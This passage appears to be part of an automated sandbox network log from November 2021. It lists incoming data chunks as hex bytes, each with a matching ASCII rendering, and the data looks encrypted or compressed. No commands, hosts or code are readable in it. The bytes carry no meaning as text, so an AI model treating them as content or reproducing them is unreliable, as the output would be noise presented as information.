#?%=\V;c-hZuPuiKITBG?>*"B?lcWD,P4kRy^`G.Nw66':$TgRj5-=fv0RgBNS7MG"RpO\D/nSpP?i1TiNoZ6?kl;.z.LXqf
2021-11-22 13:07:59 UTC	169	IN	Data Raw: 1a e7 d4 72 21 33 56 23 cf f7 15 77 ed 4f 37 4b 0d e0 9a f8 70 80 fa 5c e6 28 a4 b7 5f 61 5c 0b 54 67 36 76 66 8b b1 af e9 13 d1 4c 39 f4 b8 d1 57 d4 c4 88 9c 5a 5f 39 56 4a ae 0c f6 9a d2 e8 98 08 fc 65 a0 e4 2b 18 d2 6e 5f 7d 10 1d a8 7a a1 f5 80 87 83 a8 63 3a 53 bd 9f d6 b2 ea fa 9a ff 47 d8 60 79 1b e5 98 65 ea f3 8d 9e ae ac 71 1b c5 fd ae 17 5c 3c e1 94 c7 7d 3e 46 1f e3 de c5 64 b8 50 8c 97 68 3c 3d 46 81 21 f9 53 29 18 f1 04 d0 dd 6d 0e b6 33 e5 9f 31 45 71 ce 01 3b 1a 51 d5 55 1b 78 12 89 83 1a d0 bf f6 18 04 ef 23 eb b9 e4 14 6b bc 2f 99 b8 cb 52 33 7c 0f 65 38 4e e5 9c 24 d6 82 fc 5b 79 a9 ef 2e 0c 8d 68 0e e5 7e 8a 24 18 fe 36 d4 74 a0 c3 28 83 63 4d 19 81 04 5a 3d 94 a9 94 63 51 e9 3a 61 14 bd da 62 93 b7 32 96 17 b5 e6 aa 33 4e 1c bc 7b 55 Data Ascii: r!3V#wO7Kp\(_a\Tg6vfL9WZ_9VJe+n_}zc:SG`yeq\<}>FdPh<=F!S)m31Eq;QUx#k/R3\|e8N$[y.h~$6t(cMZ=cQ:ab23N{U
2021-11-22 13:07:59 UTC	170	IN	Data Raw: 1a 5e 1c ee dc 09 46 de a9 a2 4d 9f a5 3c b7 3a ea 83 aa 0f 0f ec 1b ac aa 68 cd ea 41 6a 37 d7 35 dd aa 96 ad 8d 95 10 87 53 b6 52 1f 74 cc 2a 1e be 69 a6 1c 0a 2f f0 e0 90 df 0e 04 4b 5a c7 30 6b 84 48 98 a9 2f 20 d2 b5 27 01 a3 e9 43 56 5e db 83 64 5a ec ab 42 70 27 80 22 bf 76 b4 ff 3c e4 04 33 b4 be d5 e6 68 dd a9 b6 08 7e 5b 78 d6 88 8f 25 c7 6b c1 25 d8 55 e6 61 f7 7b 06 95 38 3d ea 3c 2c ab 58 72 e6 51 f3 14 69 b2 d2 c2 d2 2c 5f 24 4a 4a 7a bf f3 62 ae 08 d2 47 16 50 2e 3c 06 67 27 20 dc 93 ca 80 34 b8 b8 a8 4f 44 b4 58 07 0d 8e 41 2d 9a 86 41 9f 40 bb d0 87 58 f8 8a 15 5e b6 39 b1 8c a8 3d 7e 30 00 10 ef cf f9 aa 8f 46 fb 38 20 1c e7 8c 02 ab bf 4f 2b af de d4 49 78 c0 37 59 55 88 52 06 fa 7f 5f d4 96 8e d2 68 76 7e d8 29 26 e6 f4 fa b1 0b 66 26 Data Ascii: ^FM<:hAj75SRt*i/KZ0kH/ 'CV^dZBp'"v<3h~[x%k%Ua{8=<,XrQi,_$JJzbGP.<g' 4ODXA-A@X^9=~0F8 O+Ix7YUR_hv~)&f&
2021-11-22 13:07:59 UTC	171	IN	Data Raw: b1 aa 79 cb ea b4 2f 3b 4a bc d1 92 db 70 1f 40 17 3a f1 05 e4 94 46 00 3c 68 1d 30 67 87 29 89 7c 07 99 dc 17 10 76 6d 38 bb 12 e3 83 ce 6a e9 cd 2c 2d f6 fa d5 0d 16 59 14 01 c9 19 fe be d8 0e 24 45 23 83 b4 c5 12 4f ef 2c 01 bb e5 44 1f b0 07 6f 3b 6c e3 ec 0d ce ac fd 74 6f c9 4d 2d 9a 80 4a 08 31 33 92 bc 1b d1 20 b8 de a0 5e 25 a1 65 79 9c 83 74 5e 0d 82 09 3e 63 e1 e4 18 67 9c 1c d8 c1 8e 87 24 3a bd b5 28 a7 11 48 80 b4 7d cc 7f 53 74 c4 c5 5d 35 9a 33 23 cb 7e b5 6f e7 1f 22 af 84 50 6e 86 5b 28 12 04 06 7d 09 c7 a6 78 94 0d 3e 73 c2 c2 bc 69 26 03 84 a1 fa d7 d2 e5 db 4f be a3 48 58 4f 2f 5a 6d 01 9f fe a1 45 00 2b d3 9c be a0 e0 1c 2c b1 22 b4 a8 80 9c 2c 2d 92 35 09 3c 90 4b 0c 41 fb 6f 70 b3 9e d2 2a 5a c5 f6 c9 41 a9 34 40 b9 b8 9e 3b 11 2c Data Ascii: y/;Jp@:F<h0g)\|vm8j,-Y$E#O,Do;ltoM-J13 ^%eyt^>cg$:(H}St]53#~o"Pn[(}x>si&OHXO/ZmE+,",-5<KAop*ZA4@;,
2021-11-22 13:07:59 UTC	173	IN	Data Raw: 02 53 70 fe 96 d8 36 8b 1d d4 d5 c9 7f e0 9d f0 73 28 8b 6f 2e b2 a6 2f ae 4c 58 e0 79 75 1c 41 ac 85 d1 5e 12 4a d4 5b 60 7c 13 64 6a 80 16 85 54 8e f0 2d cc 17 4d 21 00 d2 80 0e 83 63 ab 74 2a 5b b4 a5 72 01 a9 9b 52 5e 9f d1 52 47 0e b9 20 96 72 f9 ba 46 5f 22 26 e6 9f d4 bd 69 c0 11 3a ee 7b aa ab 28 59 ac 2b 18 1b e5 7c 13 81 be 77 79 ae 73 cb 1e 6b b0 70 4f a5 99 78 07 46 b6 58 6e 89 d9 c1 84 5b 7c 28 38 0c e7 b4 ab b0 dd 79 71 a4 e0 ad 71 a8 20 5d 76 e6 ae 8c af f7 6c d4 15 b3 9b e5 15 76 3b 7a a7 54 ab 94 46 ba b5 57 b4 ec c0 0c 49 35 16 96 8c 83 20 f8 34 74 2e 42 4f 76 df 75 d2 e8 74 de 56 39 ff 14 9c c6 2b 05 51 19 02 f7 95 af 73 54 af 89 21 60 d4 18 af c4 68 9b 99 c6 8f 4d 71 cc e6 19 d6 de 14 e8 f3 6a d2 3f c8 d3 64 08 fc 36 b1 4a 13 a3 07 c2 Data Ascii: Sp6s(o./LXyuA^J[`\|djT-M!ct*[rR^RG rF_"&i:{(Y+\|wyskpOxFXn[\|(8yqq ]vlv;zTFWI5 4t.BOvutV9+QsT!`hMqj?d6J
2021-11-22 13:07:59 UTC	174	IN	Data Raw: a0 2e 03 db 63 f1 3e 80 04 5a 3d 83 a9 41 65 33 c1 62 61 24 85 db 62 93 b7 25 96 17 b5 e6 a3 6b 4e c4 87 7a 55 78 62 75 24 ba 5b 10 9e 49 25 77 d2 b3 cb ea 2e 24 47 a4 74 7d 86 21 2e 56 c9 1b cd 14 f5 e0 5e de 19 77 72 b8 c4 34 4d 3b b6 99 93 fc e2 f1 c1 c8 4f c4 c5 eb 0c 48 94 47 5e 07 af 57 a1 56 00 51 d7 fc 16 84 5b 01 19 b7 e2 1d a8 e8 bb 56 2b be 95 21 19 94 7c 0a b5 c9 69 63 b3 e4 d4 56 d8 ed 08 c8 76 af 34 e8 b9 30 89 41 17 80 ba 3e fb b1 85 92 2d 92 19 f9 0f 77 56 8f 9a 3a 63 b9 2d 38 b5 09 c7 05 1e 60 5a 46 6a e4 f7 75 e2 59 52 4c 8f 89 4e 30 cd 21 3c ac 54 b3 f7 06 42 c7 47 29 37 06 d9 df fd 3e ee 97 fb 6a 38 af c9 18 3e d5 6c ef 73 56 8c ad 9d d1 c8 99 44 82 fe b8 d0 d1 1f 2d c9 50 94 e9 a8 8d f9 b3 97 4d d0 33 e8 a9 81 f3 d9 45 f3 a0 c6 fc 5c Data Ascii: .c>Z=Ae3ba$b%kNzUxbu$[I%w.$Gt}!.V^wr4M;OHG^WVQ[V+!\|icVv40A>-wV:c-8`ZFjuYRLN0!<TBG)7>j8>lsVD-PM3E\
2021-11-22 13:07:59 UTC	175	IN	Data Raw: 11 fc bf 7b 13 ae de d4 49 fd c0 b9 4c 43 9b 05 06 65 47 5e d4 96 8e 57 68 28 69 ce 3a 71 e6 88 c1 b0 0b 66 26 32 8c 07 72 4e 22 20 77 b3 5f 8a e5 d7 3b 42 1d b5 8e 03 17 0b 3d 17 cd 54 72 91 11 2c 81 ca b7 0a c2 71 4f b3 7c 96 a2 82 77 6e 58 cb 3a a4 4d 0b d9 d7 eb e8 1e d6 01 af 0f 67 9e 20 29 78 57 a7 68 f7 f9 8f 24 c2 47 32 36 86 d6 65 a9 1e 99 9d 4e d5 d8 db 65 ec e4 ff d4 a3 12 1e 02 6c 7c 3a 9f 45 08 68 ea d0 b3 37 15 aa e4 e6 d4 f2 21 b3 76 cf cd ae 1b 10 ed 63 c9 4a 0d 60 9a 78 50 2c ec 73 e8 4f a4 ff a1 60 5c 8b 54 e7 16 44 64 b4 bf c8 e9 70 2f 4d 39 74 b8 51 77 f8 d2 86 92 3d 5f 46 a8 4b ae 8c f6 1a f2 90 9a 1f f2 05 a0 7f d5 19 d2 ee 5f fd 30 36 b0 6b af 95 80 31 7d a9 63 ba 53 38 bf 58 b7 0f f5 f9 ff 95 26 61 79 9b e5 18 45 8a e8 66 91 cc ac Data Ascii: {ILCeG^Wh(i:qf&2rN" w_;B=Tr,qO\|wnX:Mg )xWh$G26eNel\|:Eh7!vcJ`xP,sO`\TDdp/M9tQw=_FK_06k1}cS8X&ayEf
2021-11-22 13:07:59 UTC	176	IN	Data Raw: b1 18 8c ab 80 9c 2c bd 9a 53 12 ff 96 01 0c a0 c2 6c 70 b3 9e 42 22 03 ea ee ca 0b a9 05 78 ba b8 9e 3b 81 24 db 0b 1d b3 f8 94 61 51 1a ea 0f 0c c0 fb 66 3a 85 bb 50 39 dd 4c c2 4c 1f 1b cc 1e 4d e3 11 77 9f 5f d1 47 8a 47 4a 4b 5b 59 65 ac b2 b1 8a 07 dd 57 44 f3 3e 7d 4f 6b d1 39 08 95 86 6c 9b b5 ee 0b 3e ae fa 2b 78 56 6a af e0 c7 1f 09 47 64 fc c3 46 95 9a 2b 2f 52 e9 f8 5a 86 fc dc 94 36 46 df d1 a9 67 f1 a4 54 fd 6c c5 1a 5e 1c 6b dc 3a 40 c8 ba f9 4d 56 1b 3e b7 3a ea 06 aa f2 0c c2 0b f7 aa 09 72 e8 41 6a 37 52 35 ed a4 80 be d6 95 bc 38 51 b6 52 1f f1 cc e3 1e a8 7a fd 1c f6 9e f2 e0 90 df 8b 04 9d 47 d1 23 30 84 a8 2b ab 2f 20 d2 30 27 55 a3 ff 50 0d 5e 6f 8b 66 5a 6c ab c5 50 df 95 4c ae 2d b4 f8 89 e6 04 33 b4 3b d5 84 6b 65 a0 e1 08 e1 ed Data Ascii: ,SlpB"x;$aQf:P9LLMw_GGJK[YeWD>}Ok9l>+xVjGdF+/RZ6FgTl^k:@MV>:rAj7R58QRzG#0+/ 0'UP^ofZlPL-3;ke
2021-11-22 13:07:59 UTC	178	IN	Data Raw: f4 22 60 d4 18 3f c4 31 99 a8 d7 a5 4d cc af e5 19 d6 de 84 e8 07 46 9a 38 e2 d3 c2 6b ff 36 b1 4a 83 bb 65 e2 32 f0 5c 25 9a a6 cc 48 19 6d 7b 4f e7 7b eb 62 e7 ee 5e 04 f9 95 ea 32 32 b7 e8 64 ba 89 29 71 26 f2 65 52 bd b5 7f 13 2b 7c df 76 c5 c7 25 50 c7 60 90 40 c9 39 b7 4f 48 8e 8b 8c 86 6c 9b f9 f0 78 36 e4 0f 29 34 ec 22 6b a6 99 ab 8d ad e8 16 87 9f ae 85 b8 2e ae 07 52 b1 e9 f7 84 69 47 21 51 9f 99 98 8e 9f 6e f0 80 93 b1 3a 71 5d c3 1b 2c 6a 4a e0 fe 91 db 70 1f d0 1f 90 ec 23 e6 c5 46 b2 Data Ascii: "`?1MF8k6Je2\%Hm{O{b^22d)q&eR+\|v%P`@9OHlx6)4"k.RiG!Qn:q],jJp#F
2021-11-22 13:07:59 UTC	178	IN	Data Raw: 14 6b 1d 30 67 17 21 89 55 cf 9a 8c 17 b0 5e 6e 38 bb 12 73 8b 6b 71 97 cc 7c 2d 78 d2 d6 0d 16 59 84 09 4c 1b 36 bd 8b 0e 80 6c 20 83 b4 c5 82 47 a6 29 7f ba b6 44 95 99 04 6f 3b 6c 73 e4 3f d7 64 fe 26 6f 61 64 2e 9a 80 4a 98 39 e8 8d c2 1a 83 20 3e f7 a3 5e 25 a1 f5 71 5f 80 e2 58 40 82 a5 16 60 e1 e4 18 f7 94 72 dd 84 91 ca 24 b8 95 b6 28 a7 11 d8 88 cd 7a b3 7a 1f 74 74 ed 5e 35 9a 33 b3 c3 38 b4 2d e8 53 22 2d ac 53 6e 86 5b b8 1a 0d 18 2b 16 88 a6 c8 bf 0e 3e 73 c2 52 b4 08 33 50 9b ee fa 4c f9 e6 db 4f be 53 4b 1b 4b 72 45 23 01 77 d5 a2 45 00 2b 41 84 89 91 bd 03 64 b1 18 9f ab 80 9c 2c bd 9a ed 22 ff 96 01 0c a9 d3 6c 70 b3 9e 42 22 1c f8 ee ca 0b a9 0a 69 ba b8 9e 3b 81 24 fa 3d 1d b3 f8 94 4d 40 1a ea 0f 0c c0 fb f6 2e 85 bb 50 39 37 5d c2 4c Data Ascii: k0g!U^n8skq\|-xYL6l G)Do;ls?d&oad.J9 >^%q_X@`r$(zztt^538-S"-Sn[+>sR3PLOSKKrE#wE+Ad,"lpB"i;$=M@.P97]L
2021-11-22 13:07:59 UTC	179	IN	Data Raw: ae 4c 58 70 71 cb 38 8f b0 af d1 a7 61 49 d4 5b 60 ec 1b b3 67 48 0a af 54 81 83 2e cc 17 4d b1 08 cc a3 2c 82 49 ab 00 59 58 b4 a5 72 91 a1 f7 44 cb 98 fb 52 45 7d ba 20 96 72 6e ba 2c 6e 50 3b cc 9f 54 c9 6a c0 11 3a 79 7b d9 af 69 44 86 2b 3e 6c e6 7c 13 81 29 77 c9 9e 38 d6 34 6b 80 07 4c a5 99 78 90 46 a5 59 32 94 f3 c1 09 2c 7f 28 38 0c 70 b4 c0 80 ed 64 5b a4 0f ef 72 a8 20 5d e1 e6 eb 8d 03 d5 46 d4 b8 f9 98 e5 15 76 ab 7a 4f 67 94 93 6c ba 46 18 b7 ec c0 0c d9 35 f2 91 44 80 0a f8 b0 3b 2d 42 4f 76 4f 75 c9 dd f8 d4 7c 39 06 58 9f c6 2b 05 c1 19 d9 f7 1f 8d 59 54 6c c4 22 60 d4 18 3f c4 c4 9a a8 d7 a5 4d 28 9f e5 19 d6 de 84 e8 60 6c 9a 38 e2 d3 67 5b ff 36 b1 4a 83 bb 0e e0 32 f0 5c 25 e7 96 cc 48 19 6d 7b 4f e6 4a eb 62 e7 ee e3 35 f9 95 ea 32 Data Ascii: LXpq8aI[`gHT.M,IYXrDRE} rn,nP;Tj:y{iD+>l\|)w84kLxFY2,(8pd[r ]FvzOglF5D;-BOvOu\|9X+YTl"`?M(`l8g[6J2\%Hm{OJb52
2021-11-22 13:07:59 UTC	180	IN	Data Raw: b7 b2 96 ed b0 ce a5 6c 4e 3e 1a 79 55 78 62 e2 24 03 43 d3 98 4e 25 1b dc b1 cb ea 2e b4 5f 2e 55 88 84 26 2e e3 56 18 cd 14 f5 30 5c b2 2d d8 71 bf c4 ae d3 38 b6 99 93 6c fa 3a e0 3d 4d c3 c5 77 92 4b 94 47 5e 97 af 8b 81 a3 02 56 d7 da 8e 87 5b 01 19 27 e2 8a ac 66 9e 51 2b 1a 0e 22 19 94 7c 9a b5 70 4f 96 b1 e3 d4 80 43 ee 08 c8 76 3f 34 4e bd 5e 9c 46 17 e0 2f 3d fb b1 85 02 2d e0 3d 0c 0d 71 56 1d 0d 39 63 b9 2d af b5 10 c5 aa 1d 66 5a 16 f9 e7 f7 75 e2 c9 52 bd a4 a1 48 36 cd 70 d2 af 54 b3 f7 91 42 d5 43 15 3c 00 d9 21 f1 3c ee 97 fb fa 20 64 dc ed 3c d3 6c 40 9d 55 8c ad 9d 51 c8 b3 40 82 fe be d0 19 f0 2e c9 50 94 6e a8 81 cf 3a 96 4b d0 71 07 aa 81 f3 d9 c2 f3 83 c2 fc 5c 61 fd 0c d1 45 2e b8 84 db 7f 39 0d 51 38 97 90 58 b6 0c 24 09 8a 3c 4c Data Ascii: lN>yUxb$CN%._.U&.V0\-q8l:=MwKG^V['fQ+"\|pOCv?4N^F/=-=qV9c-fZuRH6pTBC<!< d<l@UQ@.Pn:Kq\aE.9Q8X$<L
2021-11-22 13:07:59 UTC	182	IN	Data Raw: 68 fa 6b ce 3a 71 e6 55 04 b3 0b 66 26 32 8c ba 73 4e 22 20 77 e5 9b 89 e5 d7 3b 42 1d ec 8d 03 17 0b 3d 5e 09 57 72 91 11 2c 81 a7 b6 0a c2 71 4f 70 b8 95 a2 82 77 6e 58 b8 38 a4 4d 0b d9 12 2f eb 1e d6 01 af 0f 92 9e 20 29 78 57 90 ac f4 f9 8f 24 c2 47 fe 39 86 d6 65 a9 6e 5d 9e 4e d5 d8 db 65 af e3 ff d4 a3 12 24 c6 6f 7c 3a 9f 45 08 d5 e7 d0 b3 37 15 55 23 e5 d4 f2 21 b3 76 88 ca ae 1b 10 ed 5f 0d 49 0d 60 9a 78 50 79 e0 73 e8 4f a4 85 65 63 5c 8b 54 e7 16 91 63 b4 bf c8 e9 40 eb 4e 39 74 b8 51 77 bd da 86 92 3d 5f 4d 6c 48 ae 8c f6 1a f2 e5 9d 1f f2 05 a0 71 11 1a d2 ee 5f fd 30 94 88 6b af 95 80 31 b9 aa 63 ba 53 38 bf 98 b7 0f f5 f9 ff 9f e2 62 79 9b e5 18 45 33 d3 66 91 cc ac 88 21 c7 fd 2e 17 dc 1c ee 96 3d 72 62 46 05 d8 dc c5 e4 b8 d0 ac 6b 4d Data Ascii: hk:qUf&2sN" w;B=^Wr,qOpwnX8M/ )xW$G9en]Ne$o\|:E7U#!v_I`xPysOec\Tc@N9tQw=_MlHq_0k1cS8byE3f!.=rbFkM
2021-11-22 13:07:59 UTC	183	IN	Data Raw: ee ee ca 0b a9 20 3a ba b8 9e 3b 81 24 11 36 1d b3 f8 94 18 13 1a ea 0f 0c c0 fb b8 39 85 bb 50 39 e3 0e c2 4c 1f 1b cc 1e c3 ee 11 77 9f 5f 25 05 8a 47 4a 4b 5b 59 39 af b2 b1 8a 07 db 15 44 f3 3e 7d 4f 6b b6 2a 08 95 86 6c 9a f7 ee 0b 3e ae fa 2b 5c 55 6a af e0 c7 14 4b 47 64 fc c3 46 95 47 38 2f 52 e9 f8 56 c4 fc dc 94 36 46 df 30 ab 67 f1 a4 54 d3 22 c5 1a 5e 1c 6b dc 05 52 c8 ba f9 4d 3e 55 3e b7 3a ea 06 aa d5 0d c2 0b f7 aa 2e 3c e8 41 6a 37 52 35 e4 bb 80 be d6 95 5f 76 51 b6 52 1f f1 cc 35 1f a8 7a fd 1c 2e d0 f2 e0 90 df 8b 04 8d 44 d1 23 30 84 f6 65 ab 2f 20 d2 30 27 3f a2 ff 50 0d 5e 33 c5 66 5a 6c ab c5 50 15 96 4c ae 2d b4 3d c6 e6 04 33 b4 3b d5 9a 6a 65 a0 e1 08 26 a2 7a d6 88 8f a0 c7 55 cc 33 cb 02 e6 db 70 79 06 95 38 b8 ea e0 2a 48 4e Data Ascii: :;$69P9Lw_%GJK[Y9D>}Okl>+\UjKGdFG8/RV6F0gT"^kRM>U>:.<Aj7R5_vQR5z.D#0e/ 0'?P^3fZlPL-=3;je&zU3py8HN
2021-11-22 13:07:59 UTC	184	IN	Data Raw: 38 e2 d3 4a 28 ff 36 b1 4a 83 bb 27 e1 32 f0 5c 25 15 e5 cc 48 19 6d 7b 4f 00 79 eb 62 e7 ee d4 46 f9 95 ea 32 32 b7 38 67 ba 89 29 71 b0 b0 65 52 bd b5 7f 13 02 78 df 76 c5 c7 bf 12 c7 60 90 40 c9 39 2b 4b 48 8e 8b 8c 18 2e 9b f9 f0 78 36 e4 ea 1e 34 ec 22 6b 3b d8 ab 8d ad e8 16 87 43 a9 85 b8 2e ae 92 13 b1 e9 f7 84 69 47 ed 67 9f 99 98 8e 0a 2f f0 80 93 b1 3a 71 e9 c4 1b 2c 6a 4a 6c bf 91 db 70 1f d0 1f 88 d9 23 e6 c5 46 3e 52 6b 1d 30 67 17 21 9d 51 cf 9a 8c 17 43 18 6e 38 bb 12 73 8b a1 4c 97 cc 7c 2d cf 94 d6 0d 16 59 84 09 9e 18 36 bd 8b 0e f2 2a 20 83 b4 c5 82 47 04 24 7f ba b6 44 24 de 04 6f 3b 6c 73 e4 6b d4 64 fe 26 6f 91 23 2e 9a 80 4a 98 39 95 9e c2 1a 83 20 8d b0 a3 5e 25 a1 f5 71 63 83 e2 58 40 82 d2 50 60 e1 e4 18 f7 94 a9 ce 84 91 ca 24 Data Ascii: 8J(6J'2\%Hm{OybF228g)qeRxv`@9+KH.x64"k;C.iGg/:q,jJlp#F>Rk0g!QCn8sL\|-Y6* G$D$o;lskd&o#.J9 ^%qcX@P`$
2021-11-22 13:07:59 UTC	186	IN	Data Raw: d0 aa 74 aa 81 f3 d9 c2 f3 ed e2 fc 5c 61 fd 4b a2 45 2e b8 84 db 7f 5c 39 51 38 97 90 13 c5 0c 24 09 8a 3c 4c be c1 a7 68 4a c4 ee 43 af 66 bc ab 03 dc 49 56 50 50 62 67 31 1f 1e 4e 78 80 8a 8a 5c c0 06 92 a2 1d 1b e4 51 37 21 4d 12 30 80 ac c9 22 af a6 67 c0 a3 19 52 70 c8 db 77 54 bc 6e d6 53 32 ee 83 aa ac 50 22 37 5a e1 e2 31 c9 ad 51 2f 6b 83 a2 9c 9e 0a fb 49 30 8a f2 36 61 10 d7 d5 c9 7f 70 95 21 7d e0 97 45 2e 22 ab 2c ae 4c 58 70 71 c3 25 8f b0 af d1 3b 1f 49 d4 5b 60 ec 1b 71 64 48 0a af 54 1c fc 2e cc 17 4d b1 08 25 a1 2c 82 49 ab 94 26 58 b4 a5 72 91 a1 27 47 cb 98 fb 52 d1 02 ba 20 96 72 6e ba 07 6a 50 3b cc 9f d8 b6 6a c0 11 3a 79 7b bd ab 69 44 86 2b b2 12 e6 7c 13 81 29 77 2a a9 38 d6 34 6b 74 79 4c a5 99 78 90 46 79 5e 32 94 f3 c1 be 52 Data Ascii: t\aKE.\9Q8$<LhJCfIVPPbg1Nx\Q7!M0"gRpwTnS2P"7Z1Q/kI06ap!}E.",LXpq%;I[`qdHT.M%,I&Xr'GR rnjP;j:y{iD+\|)w*84ktyLxFy^2R
2021-11-22 13:07:59 UTC	187	IN	Data Raw: da 81 79 00 fc 5e 47 8c f2 cd a0 67 ae 80 1b 96 e1 67 16 b3 1c 85 98 00 72 b6 46 d8 c8 3e c7 e5 b9 7f a1 e6 6b 1c 31 34 8c c7 fb fa 29 5f da fd f2 8b 6c 25 9e 01 e5 82 b6 58 54 3f 03 ec 1a 59 dc fa 14 98 12 6f 0d e4 d1 7e f6 81 1c 86 20 42 b4 d8 3b 54 3b 3e 98 de de 47 30 94 07 fd 10 66 e6 fd a2 04 b1 f3 58 46 a8 e2 07 90 83 7b 0f 02 ef 51 26 d1 fe 46 f3 f5 a2 97 25 ce 6f 6d 92 b8 05 f0 31 cb a8 ca 62 9d fd 0b 61 d5 34 7d 46 b1 b4 65 97 15 90 ae a7 38 4f 36 26 53 56 51 63 f2 17 d5 5f 1c 9b a0 02 f7 f3 e2 ca 66 0d 1e 5c 60 51 f5 b4 1b 2d c3 7a 4c de 53 f6 7f 5c ca 1c 2d 73 a3 c5 ba e5 30 b5 f8 92 0c d8 a1 e7 b2 4e 37 da cd bf 38 95 5a 7b 12 af a1 a1 31 15 72 d4 05 a2 85 4b 5f 1a 30 e3 6d 82 e4 9f a5 2a 59 07 69 18 05 7d a9 be af 6d c9 b2 e1 c4 a6 6d 2d 09 Data Ascii: y^GggrF>k14)_l%XT?Yo~ B;T;>G0fXF{Q&F%om1ba4}Fe8O6&SVQc_f\`Q-zLS\-s0N78Z{1rK_0m*Yi}mm-
2021-11-22 13:07:59 UTC	188	IN	Data Raw: 07 eb bc 88 d1 b0 6a 40 bd 2f 00 cb e6 18 c6 9b 8f 9f c7 f6 c3 0c cc 56 e6 31 3e bc 0e 44 3b 56 da bc 2f 67 4c a2 e1 43 38 c5 6b 8e c6 e9 db 88 4b 7a 50 5e 73 22 32 7f 8b 90 d1 b5 15 1f 01 8e 1e 74 24 e7 2c bd cb 69 37 e3 98 29 53 5d a6 06 0a e8 4c e8 2d fc a2 1b 9e f4 b8 a7 83 09 f1 93 d1 ec bf b9 b8 6e ab 47 77 e5 15 cb ec f6 22 8f 8b 47 ff 5f 35 04 e5 8d 10 e7 a8 52 ea 5e dd 49 56 4e c4 8f 4e d7 ba 31 07 a7 b9 e3 f9 0b 87 70 68 89 7d ec 31 bd e6 c0 29 07 0f 8f 24 03 86 66 75 41 22 20 62 2d ab 3a e5 40 3b 07 14 31 98 98 00 ac 34 73 34 d3 41 71 18 ee 81 1d bd 6e c7 a5 4f ae a9 4e a7 d3 75 e5 7d a6 2b eb 4f 87 f2 5e 1c 65 1e 32 33 00 05 f6 9d b7 31 3a 5d b0 95 82 ec c6 25 c5 46 71 20 26 de 11 ad 42 57 d7 44 cc dc 50 40 01 e3 28 d2 cf 04 74 f5 4c 78 27 ba Data Ascii: j@/V1>D;V/gLC8kKzP^s"2t$,i7)S]L-nGw"G_5R^IVNN1ph}1)$fuA" b-:@;14s4AqnONu}+O^e231:]%Fq &BWDP@(tLx'
2021-11-22 13:07:59 UTC	189	IN	Data Raw: 5d 64 3a 68 8e 50 3c 1b 35 b5 e2 d5 4b cf b4 f2 75 50 86 49 59 24 84 ca 26 8d f4 c5 1e 7c b1 26 da 43 95 ae 2c 56 80 85 2e 61 37 08 9e 1f 7d 16 6c 2e 62 15 fe 59 10 09 34 14 c5 81 a9 98 fc 17 24 35 89 18 6f 8f 5f 0e 0e fe 0c 14 14 b8 b5 ac bc ed 3c 5f d7 1f b6 57 3a 07 b0 b1 ed 6b e8 25 dc 68 a9 6c 4b ed 5d 1c 50 f7 01 f2 f2 63 52 51 2a 9a 97 6b 92 1a 07 67 b8 2d 9d e0 86 e4 08 dc 8d b2 21 6d 81 a7 0e 24 c4 f9 70 f2 86 45 26 9d e9 ed dd df a9 66 6b 17 a0 37 3b df 09 ed 27 ea b0 e9 b8 e8 53 89 eb 74 2d b3 ee 41 3d 7e 9c 3e 39 54 4a dd 69 0d 01 4b 1f 87 fd 78 73 f3 5e 1e 6a 07 41 0b 49 b1 7d ce a9 5d b6 f3 13 51 50 47 f6 fb 5f 68 71 ae 38 36 b9 23 6f 51 b4 57 22 89 b4 c5 2b ae 72 4e b7 a4 c4 9f 07 49 7f 4d c3 f1 94 c0 37 35 50 89 dd bb 81 fa dd 89 13 a8 d8 Data Ascii: ]d:hP<5KuPIY$&\|&C,V.a7}l.bY4$5o_<_W:k%hlK]PcRQ*kg-!m$pE&fk7;'St-A=~>9TJiKxs^jAI}]QPG_hq86#oQW"+rNIM75P
2021-11-22 13:07:59 UTC	191	IN	Data Raw: 78 84 ad f6 46 63 0d 99 4a e7 7d 8f a7 06 70 63 af f0 d5 f0 6c 2d 26 8a a6 60 78 c1 48 5c 5d 15 95 5b ed 95 2c b4 2f 25 29 f5 b4 f5 b6 2c 6a 00 a4 a5 cf 2d 98 c8 5e be e1 9d 9e 2b d3 42 d1 6c c2 21 c2 04 77 b2 56 f5 50 a3 96 6e aa 5f 1e 04 ec b4 19 ab 12 58 90 dd 92 9b df b9 1d 32 67 8f 76 38 72 af cf 10 d2 28 3b e3 5c 98 ee c2 02 26 03 9e de 08 88 0c 47 de e1 09 62 a5 02 89 c0 75 9e 28 c5 cb 4d 0c be 62 35 56 d2 4b e9 8b 78 b2 3e db d2 15 5c ee 36 fd 4b 08 9e 09 e7 fd f3 28 2d c8 9c 77 4f c7 74 4e 4c 8e 4c 15 73 5f c6 14 16 df 9d 68 35 e0 b6 0a 53 86 8c 18 70 d6 cf 49 53 b4 b1 82 3c 18 64 6d 75 a5 e2 b7 48 89 61 b4 48 dd 3e 5f 4e d9 9c 2b a4 ae 7e 59 d7 de 79 fc e5 5a 02 b4 e8 03 6a 14 82 2b 8a f1 e9 9d a2 90 a8 5a b9 9d 85 24 68 8a ea 9c 92 d1 46 e1 63 Data Ascii: xFcJ}pcl-&`xH\][,/%),j-^+Bl!wVPn_X2gv8r(;\&Gbu(Mb5VKx>\6K(-wOtNLLs_h5SpIS<dmuHaH>_N+~YyZj+Z$hFc
2021-11-22 13:07:59 UTC	192	IN	Data Raw: a0 3d 05 17 d5 8c a3 f9 5e 44 19 b9 e2 0a ac 7f 95 24 2b 1e 26 db 13 9c 7c 84 b0 83 6c 78 b3 12 d1 18 71 e4 08 58 73 91 18 77 b8 2c 9b 06 3b 0d 02 4c fb 74 85 ba 2d cd 0f 73 23 22 56 58 37 99 4f 97 2d 92 a2 8a ec 0c 1f 30 5a 5b d7 a5 f7 66 e2 42 52 03 88 54 4a 56 cd 1a fc b6 54 9f f7 4e 42 23 46 28 3e 1e d9 70 df 12 ee f4 fb 7f 20 af ec 62 3e dd 6c df b3 d7 8c 86 9d 82 c8 8d 45 7f fc ef d0 16 de 57 c9 15 94 7b a8 02 fe 99 94 bf d0 ac 29 ae 80 53 d9 7f f3 21 c7 bb 5e d7 fd 99 ff e6 2e 6b 84 08 7f b0 3c a4 3a f7 90 09 98 cd 24 77 8b 6a 4c 51 ea 04 6a f4 c4 d6 1e ae 64 7f ab 86 dc 2d 53 56 52 34 67 89 42 ff 4e fb 80 59 8a 96 f1 cb 90 9a 1d 04 bb 40 37 3c 4d a4 31 30 a9 32 20 f2 a7 0c 9e e4 19 12 71 75 db c6 64 1a 6d b8 53 4d b0 e1 ab bf 50 a9 37 e1 e5 2f 33 Data Ascii: 